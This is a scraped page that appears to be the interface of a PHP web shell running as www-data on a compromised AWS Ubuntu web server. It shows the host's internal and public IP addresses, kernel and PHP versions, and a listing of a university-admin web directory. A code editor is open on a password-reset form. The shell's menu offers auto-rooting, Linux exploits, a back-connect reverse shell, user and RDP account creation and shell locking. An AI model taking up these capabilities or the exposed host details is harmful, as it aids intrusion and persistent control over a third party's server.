Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.101.154
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
univadmin /
hcon /
[ HOME SHELL ]
Name
Size
Permission
Action
.sass-cache
[ DIR ]
drwxrwxr-x
admin
[ DIR ]
drwxrwxr-x
const
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
fonts
[ DIR ]
drwxrwxr-x
hdfc
[ DIR ]
drwxrwxr-x
html_modules
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
php
[ DIR ]
drwxrwxr-x
scss
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.DS_Store
6
KB
-rw-r--r--
forgotpwd.html
717
B
-rw-r--r--
index.html
5.5
KB
-rw-r--r--
login.html
2.71
KB
-rw-r--r--
readme.txt
130
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forgotpwd.html
<div class="signup-form" id="resend_pass"> <h2 class="form-title">Reset Password</h2> <form method="POST" class="register-form""> <div class="form-group"> <label for="femail"><i class="zmdi zmdi-email"></i></label> <input type="text" name="Email_ID" id="femail_id" placeholder="Enter Mobile no / Email Id" /> </div> <div class="form-group"> <span name="signin" id="signin" class="form-submit" onclick="resendPass()" >Send</span > </div> <div class="d-flex justify-content-between"> <div class="mr-auto"> <a href="./login.html" class="signin-image-link">Login Here</a> </div> </div> </form> </div>
Close